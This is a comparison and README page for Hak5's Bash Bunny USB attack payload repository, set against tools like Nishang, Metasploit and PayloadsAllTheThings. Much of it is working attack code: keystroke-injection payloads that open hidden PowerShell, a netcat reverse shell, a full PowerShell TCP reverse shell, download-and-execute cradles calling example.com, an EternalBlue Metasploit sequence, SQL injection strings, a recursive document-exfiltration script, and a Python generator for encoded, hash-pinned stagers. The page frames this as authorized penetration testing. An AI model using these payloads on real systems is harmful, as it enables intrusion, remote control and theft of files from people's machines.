Top Related Projects
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
PowerSploit - A PowerShell Post-Exploitation Framework
Metasploit Framework
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Impacket is a collection of Python classes for working with network protocols.
Quick Overview
The hak5/bashbunny-payloads repository is a collection of payloads for the Bash Bunny, a USB attack platform developed by Hak5. It contains various scripts and payloads that can be executed when the Bash Bunny is plugged into a target computer, allowing for automated penetration testing, security assessments, and other cybersecurity-related tasks.
Pros
- Extensive collection of ready-to-use payloads for various attack scenarios
- Community-driven project with regular updates and contributions
- Compatible with multiple operating systems (Windows, macOS, Linux)
- Well-documented payloads with clear instructions and explanations
Cons
- Potential for misuse if not handled responsibly
- Some payloads may become outdated as target systems are patched
- Requires physical access to the target machine
- Limited by the capabilities of the Bash Bunny hardware
Code Examples
- Example of a simple Windows payload to gather system information and write it straight to the Bash Bunny's loot directory:
# Filename: payload.txt
LED SETUP
ATTACKMODE HID STORAGE
Q DELAY 1000
LED ATTACK
Q GUI r
Q DELAY 500
Q STRING powershell -WindowStyle Hidden -Command "systeminfo | Out-File -Encoding ASCII ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\sysinfo.txt')"
Q ENTER
Q DELAY 15000
LED FINISH
This payload presents the Bash Bunny as a keyboard and a flash drive at the same time, opens the Run dialog, and launches a hidden PowerShell that runs systeminfo and writes its output as ASCII text into the loot\ folder of the USB volume labelled BashBunny. Nothing is left behind in %TEMP% on the target, and the loot is already on the Bunny when it is unplugged. systeminfo can take well over ten seconds on a domain-joined machine, so the final delay is only a rough allowance; LED FINISH signals that typing is complete, not that the file is closed, so wait for disk activity to stop before removing the device.
- Example of a macOS payload to capture a screenshot:
# Filename: payload.txt
LED SETUP
ATTACKMODE HID
Q DELAY 1000
Q GUI SPACE
Q DELAY 500
Q STRING terminal
Q ENTER
Q DELAY 2000
Q STRING screencapture -x /tmp/screenshot.png
Q ENTER
Q DELAY 1000
Q STRING exit
Q ENTER
ATTACKMODE STORAGE
LED FINISH
This payload opens Spotlight (GUI SPACE), launches Terminal, captures a silent screenshot with the screencapture command (-x suppresses the shutter sound) and saves it to the /tmp directory on the target; it does not copy the image to the Bash Bunny. On macOS 10.15 and later, screencapture run from Terminal is subject to the Screen Recording privacy control, and without that permission the saved image contains only the desktop background, so check the output before relying on this payload. Allow a generous delay for Terminal to start, since the first launch after login can take several seconds.
- Example of a Linux payload to create a reverse shell:
# Filename: payload.txt
# REQUIRED - listener address and port; placeholders, change before use
LHOST="192.168.1.100"
LPORT="4444"
LED SETUP
ATTACKMODE HID
Q DELAY 1000
Q ALT F2
Q DELAY 500
Q STRING gnome-terminal
Q ENTER
Q DELAY 1000
Q STRING nc -e /bin/sh $LHOST $LPORT
Q ENTER
ATTACKMODE STORAGE
LED FINISH
This payload opens the GNOME Shell run dialog (ALT F2), starts gnome-terminal and connects a shell back to the listener at $LHOST:$LPORT using netcat; the address and port are bash variables at the top of the file, following the repository's configuration convention. The -e option exists only in netcat-traditional and Nmap's ncat. The OpenBSD netcat that Debian and Ubuntu install by default does not support it, so on those systems the line fails silently unless one of the other implementations is present.
Getting Started
To use these payloads:
- Clone the repository:
git clone https://github.com/hak5/bashbunny-payloads.git
- Choose a payload and copy its directory (payload.txt plus any resources it needs) onto the Bash Bunny's USB storage under payloads/.
- Make sure the payload file is named payload.txt and sits directly in the switch-position folder you want to use (payloads/switch1/ or payloads/switch2/).
- Safely eject the Bash Bunny and set the selector switch to the corresponding position.
- Plug the Bash Bunny into the target machine to execute the payload.
Always ensure you have proper authorization before using these payloads on any system.
Competitor Comparisons
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Pros of Nishang
- Broader scope of PowerShell-based offensive security tools and scripts
- More versatile, can be used across various platforms and scenarios
- Regularly updated with new features and improvements
Cons of Nishang
- Requires more technical knowledge to use effectively
- Less user-friendly for beginners compared to Bash Bunny's plug-and-play approach
- May trigger antivirus software more easily due to its well-known signatures
Code Comparison
Nishang (PowerShell):
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
Bash Bunny Payloads (Bash):
#!/bin/bash
LED SETUP
ATTACKMODE HID STORAGE
QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 500
# payload.txt is run by bash, so $ is escaped to let PowerShell, not bash, expand the variables
QUACK STRING "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"\$p=\$env:TEMP+'\payload.ps1';(New-Object Net.WebClient).DownloadFile('http://example.com/payload.ps1',\$p);powershell -ExecutionPolicy Bypass -File \$p\""
QUACK ENTER
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Pros of Unicorn
- More versatile, supporting multiple payload types and encoding methods
- Easier to use for generating payloads without specialized hardware
- Regularly updated with new features and improvements
Cons of Unicorn
- Requires more manual setup and execution compared to BashBunny
- Limited to software-based attacks, lacking hardware integration
- May be less stealthy in some scenarios due to software-based nature
Code Comparison
Unicorn payload generation:
unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
BashBunny payload execution:
LED SETUP
ATTACKMODE HID
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
QUACK ENTER
While Unicorn focuses on generating payloads for various attack vectors, BashBunny-Payloads are designed for specific hardware-based attacks using the Bash Bunny device. Unicorn offers more flexibility in payload creation, while BashBunny-Payloads provide a streamlined approach for physical access scenarios.
PowerSploit - A PowerShell Post-Exploitation Framework
Pros of PowerSploit
- More versatile and can be used on any Windows system with PowerShell
- Offers a wider range of post-exploitation and reconnaissance tools
- Actively maintained with regular updates and contributions
Cons of PowerSploit
- Requires PowerShell execution, which may be restricted in some environments
- More complex to use, requiring PowerShell scripting knowledge
- May trigger antivirus or security software more easily due to its nature
Code Comparison
PowerSploit (Get-GPPPassword function):
function Get-GPPPassword {
[CmdletBinding()]
Param (
[Parameter(Mandatory=$false,
HelpMessage="Credentials to use when connecting to a Domain Controller.")]
[System.Management.Automation.PSCredential]
[System.Management.Automation.Credential()]
$Credential = [System.Management.Automation.PSCredential]::Empty
)
Bashbunny-payloads (minimal bash payload using the loot directory convention):
#!/bin/bash
# Loot belongs under /root/udisk/loot so it shows up on the BashBunny USB volume
LOOT_DIR=/root/udisk/loot/example
mkdir -p $LOOT_DIR
LED SETUP
# payload.txt runs on the Bunny itself, so these copy the Bunny's own files, not the target's
cp /etc/passwd $LOOT_DIR/
cp /etc/shadow $LOOT_DIR/
LED FINISH
The PowerSploit code is the parameter block of a PowerShell function that retrieves passwords from Group Policy Preferences on a domain controller; the Bash Bunny snippet is a plain bash script that only shows the repository's loot-directory and LED-state conventions. A payload.txt executes on the Bunny's own Linux system, so the two cp lines read the Bunny's /etc/passwd and /etc/shadow, not the target's; reaching the target's data requires an ATTACKMODE (HID, storage or Ethernet) plus keystrokes or a network service, as in the other examples on this page. PowerSploit offers far more capability but needs PowerShell and Active Directory knowledge, whereas Bash Bunny payloads are short scripts tied to the hardware.
Metasploit Framework
Pros of Metasploit-framework
- Extensive library of exploits and modules for various platforms and vulnerabilities
- Active community and regular updates, ensuring up-to-date security testing capabilities
- Supports a wide range of penetration testing tasks beyond just payload delivery
Cons of Metasploit-framework
- Steeper learning curve due to its comprehensive nature and command-line interface
- Requires more setup and configuration compared to the plug-and-play nature of Bash Bunny
- May be overkill for simple USB-based attacks or social engineering scenarios
Code Comparison
Metasploit-framework (Ruby):
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
Bashbunny-payloads (Bash):
LED SETUP
ATTACKMODE HID STORAGE
RUN WIN powershell.exe -WindowStyle Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')"
LED FINISH
This comparison highlights the different approaches: Metasploit-framework offers a more comprehensive and flexible framework for various attack vectors, while Bashbunny-payloads focuses on quick, USB-based payload delivery with simpler scripting.
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- Broader scope covering various attack vectors and techniques
- More comprehensive documentation with detailed explanations
- Regularly updated with contributions from a larger community
Cons of PayloadsAllTheThings
- Less focused on specific hardware (unlike Bash Bunny payloads)
- May require more adaptation for use in specific scenarios
- Potentially overwhelming for beginners due to the vast amount of information
Code Comparison
PayloadsAllTheThings (SQL Injection example):
' OR '1'='1
' OR 1 -- -
' OR '1'='1' #
Bash Bunny Payloads (Exfiltration example):
LED STAGE1
ATTACKMODE HID STORAGE
# $ is escaped because payload.txt is processed by bash before the keystrokes are typed
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"mode con:cols=18 lines=1;Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.doc -File -Recurse -ErrorAction SilentlyContinue | % {Copy-Item \$_.FullName -Destination ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\') -Force}\""
The PayloadsAllTheThings example showcases simple SQL injection techniques, while the Bash Bunny Payloads example demonstrates a more complex exfiltration script tailored for the Bash Bunny hardware. This highlights the difference in focus between the two repositories, with PayloadsAllTheThings offering a wider range of attack vectors and Bash Bunny Payloads providing hardware-specific scripts.
Impacket is a collection of Python classes for working with network protocols.
Pros of Impacket
- Comprehensive library for working with network protocols
- Supports a wide range of protocols (SMB, MSRPC, NTLM, Kerberos, etc.)
- Actively maintained with regular updates and contributions
Cons of Impacket
- Steeper learning curve due to its extensive functionality
- Requires more setup and configuration compared to Bash Bunny payloads
- Not specifically designed for quick, plug-and-play attacks
Code Comparison
Impacket example (SMB connection):
from impacket.smbconnection import SMBConnection
conn = SMBConnection(target, target)
conn.login(username, password)
Bash Bunny payload example:
LED SETUP
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden
QUACK ENTER
While Impacket provides a powerful library for network protocol manipulation, Bash Bunny payloads offer simpler, script-based attacks designed for quick execution via USB devices. Impacket is more versatile but requires more expertise, whereas Bash Bunny payloads are easier to deploy but limited to specific attack scenarios.
README
Payload Library for the Bash Bunny by Hak5
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality. See Legal and Disclaimers
View Featured Bash Bunny Payloads and Leaderboard
Get your payload in front of thousands. Enter to win over $2,000 in prizes in the Hak5 Payload Awards!
About the Bash Bunny
Linux machine in a USB. By emulating combinations of trusted USB devices (gigabit Ethernet, serial, flash storage and keyboards), the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
ADVANCED ATTACKS
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone or in combination, and more!
SIMPLE PAYLOADS
Each attack, or payload, is written in a simple DuckyScript™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading 'em onto the Bash Bunny just as you would any ordinary flash drive.
SIMPLE POWERFUL HARDWARE
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
Build your payloads with PayloadStudio
Take your DuckyScript™ payloads to the next level with this full-featured, web-based (entirely client side) development environment.
Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
Become a PayloadStudio Pro and Unleash your hacking creativity!
OR
Try Community Edition FREE
Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
Contributing
View Featured Payloads and Leaderboard
Please adhere to the following best practices and style guides when submitting a payload.
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and approved pull requests will add your payload to this repository, where it may be publicly available.
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested and free of errors. If your payload contains (or is based on) the work of others, please make sure to cite their work, giving proper credit.
Purely Destructive payloads will not be accepted. No, it's not "just a prank".
Subject to change. Please ensure any submissions meet the latest version of these standards before submitting a Pull Request.
Naming Conventions
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submitted in its own directory, with - or _ used in place of spaces, under one of the existing categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
Staged Payloads
"Staged payloads" are payloads that download code from some resource external to the payload.txt.
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is not a CDN for deployment on target systems.
Staged code should be copied to and hosted on an appropriate server for doing so by the end user - Github and this repository are simply resources for sharing code among developers and users. See: GitHub acceptable use policies
Additionally, any source code that is intended to be staged (by the end user on the appropriate infrastructure) should be included in any payload submission, either in the comments of the payload itself or as a separate file. Links to staged code are unacceptable, not only for the reasons listed above but also for version control and user safety reasons: arbitrary code hidden behind some pre-defined external resource via a URL in a payload could be replaced at any point in the future unbeknownst to the user, potentially turning a harmless payload into something dangerous.
Including URLs
URLs used for retrieving staged code should refer exclusively to example.com and be held in a bash variable in any payload submission; see the Payload Configuration section below.
Staged Example
Example scenario: your payload downloads a script and then executes it on a target machine.
- Include the script in the directory with your payload
- Provide instructions for the user to move the script to the appropriate hosting service.
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
Simple Example of this style of payload
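The README's warning that code behind a URL can be swapped out after a payload is published applies just as much to the end user's own staging host. One mitigation is to pin the stage's SHA-256 inside the payload so the target only executes the exact file the operator reviewed. The Python below is an added example written for this page, not a repository payload: it hashes the local stage script, renders a PowerShell stager that downloads the file, compares the digest and only then invokes the code, and base64-encodes that stager as a -EncodedCommand so no $ or quote characters have to survive bash and the Run dialog. STAGE_URL uses the README's example.com placeholder, and STAGE_PS1 is a constructed sample standing in for the script shipped beside payload.txt; both are assumptions of the example.

```python
"""Pin a staged script's SHA-256 in a Bash Bunny payload (added example)."""
import base64
import hashlib
import hmac

# README placeholder: the user re-hosts stage.ps1 and replaces example.com
STAGE_URL = "http://example.com/stage.ps1"

# Constructed sample stage script; in a real payload this is the file that ships
# next to payload.txt. Save the real one as UTF-8 without BOM: the digest covers
# the raw bytes and the stager decodes them as UTF-8 before Invoke-Expression.
STAGE_PS1 = b"Write-Host 'stage running'\r\n"


def sha256_hex(data: bytes) -> str:
    """Hex digest that gets embedded in the payload."""
    return hashlib.sha256(data).hexdigest()


def verify_stage(data: bytes, expected_hex: str) -> bool:
    """The check the generated stager performs on the target, in Python form."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def stager_script(url: str, digest_hex: str) -> str:
    """PowerShell one-liner: download, hash, compare, and only then execute."""
    return (
        "$b=(New-Object Net.WebClient).DownloadData('%s');"
        "$d=([BitConverter]::ToString([Security.Cryptography.SHA256]::Create()"
        ".ComputeHash($b)) -replace '-','').ToLower();"
        "if($d -eq '%s'){IEX ([Text.Encoding]::UTF8.GetString($b))}else{exit 1}"
    ) % (url, digest_hex)


def encode_command(script: str) -> str:
    """powershell -EncodedCommand expects base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse of encode_command, handy for reviewing what will be typed."""
    return base64.b64decode(b64).decode("utf-16-le")


def pinned_run_win_line(url: str, stage: bytes) -> str:
    """The RUN WIN line to paste into payload.txt. The base64 form contains no
    $ or quote characters, so bash and the Run dialog pass it through untouched."""
    return (
        "RUN WIN powershell -WindowStyle Hidden -Exec Bypass -EncodedCommand "
        + encode_command(stager_script(url, sha256_hex(stage)))
    )


if __name__ == "__main__":
    print("# stage digest:", sha256_hex(STAGE_PS1))
    print(pinned_run_win_line(STAGE_URL, STAGE_PS1))
```

The generated line is long (the whole stager is typed through the emulated keyboard), and -EncodedCommand is a well-known indicator that many EDR products alert on, so this is a choice for integrity, not stealth. The digest changes whenever the stage changes, so regenerate the line as part of editing the stage rather than by hand.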
Payload Configuration
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained. In many cases, payloads will require some level of configuration by the end payload user.
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how the specific resources should be hosted on the appropriate infrastructure.
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
Example:
BEGINNING OF PAYLOAD
... Payload Documentation...
# CONFIGURATION
# REQUIRED - Provide URL used for Example
MY_TARGET_URL="example.com"
# OPTIONAL - How long until payload starts; default 5s
BOOT_DELAY="5000"
QUACK DELAY $BOOT_DELAY
...
QUACK STRING $MY_TARGET_URL
...
Payload Documentation
Payloads should begin with # bash comments specifying the title of the payload, the author, the target, and a brief description.
Example:
BEGINNING OF PAYLOAD
# Title: Example Payload
# Author: Korben Dallas
# Description: Opens hidden powershell and
# Target: Windows 10
# Props: Hak5, Darren Kitchen, Korben
# Version: 1.0
# Category: General
Binaries
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
Configuration Options
Configurable options should be specified in variables at the top of the payload.txt file
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/quickcreds
LED
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
# Initialization
LED SETUP
GET SWITCH_POSITION
GET HOST_IP
# Attack
LED ATTACK
ATTACKMODE HID ECM_ETHERNET
Stages and States
Stages should be documented with comments
# Keystroke Injection Stage
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED STAGE1
ATTACKMODE HID
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
Common payload states include a SETUP, which may include a FAIL if certain conditions are not met. This is typically followed by either a single ATTACK or multiple STAGEs. More complex payloads may include a SPECIAL function to wait until certain conditions are met. Payloads commonly end with a CLEANUP phase, such as moving and deleting files or stopping services. A payload may FINISH when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to LED states.
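The conventions above (a documentation header, example.com placeholder URLs held in bash variables, configuration variables at the top of the file, an LED state before ATTACKMODE, no spaces in names) are mechanical enough to check before opening a pull request. The following Python script is an added example written for this page, not tooling from the repository; the finding codes, the GOOD and BAD sample payloads, and the choice of which commands count as the start of the attack are all assumptions of the example.

```python
"""Style-guide linter for a Bash Bunny payload.txt (added example)."""
import re

REQUIRED_HEADER = ("Title", "Author", "Description", "Target")
# Assumption: once one of these runs, the "top of the payload" is over.
ATTACK_CMD = re.compile(r"^(ATTACKMODE|Q|QUACK|RUN)\b")
URL = re.compile(r"""https?://([^/\s"']+)""")
ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
HEADER_FIELD = re.compile(r"^#\s*([A-Za-z]+):")


def lint_payload(text, dirname=None):
    """Check one payload.txt against the repository conventions.

    Returns a list of (line_number, code) tuples; an empty list means the
    payload passes every check this linter knows about. Line 0 is used for
    findings about the payload directory rather than its contents.
    """
    findings = []
    header = set()
    in_header = True        # still inside the leading comment block
    attack_started = False  # an ATTACKMODE/Q/QUACK/RUN line has been seen
    led_seen = False

    if dirname is not None and " " in dirname:
        findings.append((0, "name-has-spaces"))

    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        # Personal URLs are not allowed anywhere, comments included.
        for host in URL.findall(line):
            if host != "example.com" and not host.endswith(".example.com"):
                findings.append((no, "url-not-placeholder"))
        if line.startswith("#"):
            m = HEADER_FIELD.match(line)
            if m and in_header:
                header.add(m.group(1))
            continue
        in_header = False
        # Staged URLs belong in a bash variable, not inline in a command.
        if URL.search(line) and not ASSIGN.match(line):
            findings.append((no, "url-not-in-variable"))
        if ASSIGN.match(line):
            if attack_started:
                findings.append((no, "config-not-at-top"))
            continue
        if line.startswith("LED"):
            led_seen = True
        if line.startswith("ATTACKMODE") and not led_seen:
            findings.append((no, "led-before-attackmode"))
        if ATTACK_CMD.match(line):
            attack_started = True

    for field in REQUIRED_HEADER:
        if field not in header:
            findings.append((1, "missing-header:" + field))
    return findings


# Constructed sample that follows the conventions.
GOOD = r"""# Title: Example Payload
# Author: Korben Dallas
# Description: Opens hidden powershell and runs a staged script
# Target: Windows 10
# Version: 1.0
# Category: General
#
# REQUIRED - host stage.ps1 yourself and point STAGE_URL at it
STAGE_URL="http://example.com/stage.ps1"
# OPTIONAL - delay before typing starts
BOOT_DELAY="1000"
LED SETUP
ATTACKMODE HID
QUACK DELAY $BOOT_DELAY
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"IEX (New-Object Net.WebClient).DownloadString('$STAGE_URL')\""
LED FINISH
"""

# Constructed sample that breaks several of them.
BAD = """# Title: Bad Payload
# Author: someone
ATTACKMODE HID
QUACK STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')
LOOT=/root/udisk/loot
"""

if __name__ == "__main__":
    for name, sample in (("GOOD", GOOD), ("BAD", BAD)):
        print(name, lint_payload(sample) or "ok")
```

Run it over a payload directory before submitting; each finding carries the line number so it can be fixed in place. The checks are deliberately narrow and only cover rules that can be decided from the text, so a clean run is necessary, not sufficient, for review.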
Legal
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner. Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license) DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org. This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use. Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
See also:
Hak5 Software License Agreement